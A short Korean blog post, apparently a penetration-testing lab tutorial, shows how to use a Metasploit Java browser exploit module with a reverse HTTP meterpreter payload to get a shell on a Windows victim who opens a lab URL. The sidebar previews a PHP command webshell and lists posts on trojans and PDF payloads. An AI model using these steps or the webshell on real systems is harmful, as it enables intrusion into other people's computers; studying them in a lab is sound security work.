# 메타스플로잇을 이용한 java 클라이언트 사이드 취약점 공격
메타스플로잇에서 jre17 으로 검색한 후 exploit/multi/browser/java_jre17_jmxbean_2 모듈을 사용한다. 모듈명에서 multi 를 보아하니 윈도우 리눅스 관계없이 적용되는 모듈이란 것을 알 수 있다.
클라이언트 사이드 공격의 경우 칼리리눅스에 서버를 실행하고 개인 사용자가 웹이나 파일을 통해 접속하는 형태로 공격한다.
또한 payload를 java payload java/meterpreter/reverse_http 로 설정한다.
페이로드도 역시 앞에 windows 나 linux 로 설정되는데 java로 설정된 것을 보아 윈도우 리눅스 관계없이 실행되리란 것을 알 수 있다.
java 클라이언트 사이드 공격의 경우는 서버 공격과 달리 쉘이 바로 떨어지지 않는다.
윈도우에서 http://192.168.203.133:8080/jre17 로 접속을 하면 java 버전이 낮다고 경고를 한다. 그러나 이를 무시하고 그냥 접속한다.
다음과 같이 칼리리눅스에 변화가 생긴다. 백그라운드로 세션이 열린것이다
sessions -i 1 을 입력하면 meterpreter 쉘을 얻을 수 있다, shell, screenshot 등의 명령어를 사용 할 수 있다.
Popular Posts
-
/* PHP Version URL CMD WebShell */ /* 사용법 : hxxp://URL/cmd.php?cmd=명령어 */ <? echo " <FORM ACTIO...
-
1. XSS 취약점 이란 대부분의 웹 해킹 기법은 웹 서버 설정 혹은 프로그램의 취약점을 공격하지만, XSS는 사용자를 공격하는 기법이다. 예를 들어 악성 코드가 포함된 글을 읽는 순간 악성 프로그램이 설치되거나 쿠키 혹은 세션 정보가 공격자에게 ...
Recent Posts
Blog Archive
-
▼
2018
(
66
)
-
▼
8월
(
14
)
- [mutillidae] mutillidae 계정 생성 및 로그인
- [metasploitable] nmap 이후 발견된 서비스에 대한 공격 테스트
- [메모] CSS 강의 좋은 곳
- [PentestrLAB] from sql to shell 취약점 점검
- metasploitable 설치
- [Self Question] Linux 에서 윈도우로 ssh 접속
- [kali linux] ftp 설정 및 메모 정보
- 칼리리눅스를 이용한 사회공학 공격
- ARP 패킷 분석
- 트로이 목마 제작 (backdoor)
- pdf 에 공격코드 삽입
- [metasploitable] java 공격
- [metasploitable] webdav 취약점
- [metasploitable] php cgi 취약점 공격
-
▼
8월
(
14
)
Powered by Blogger.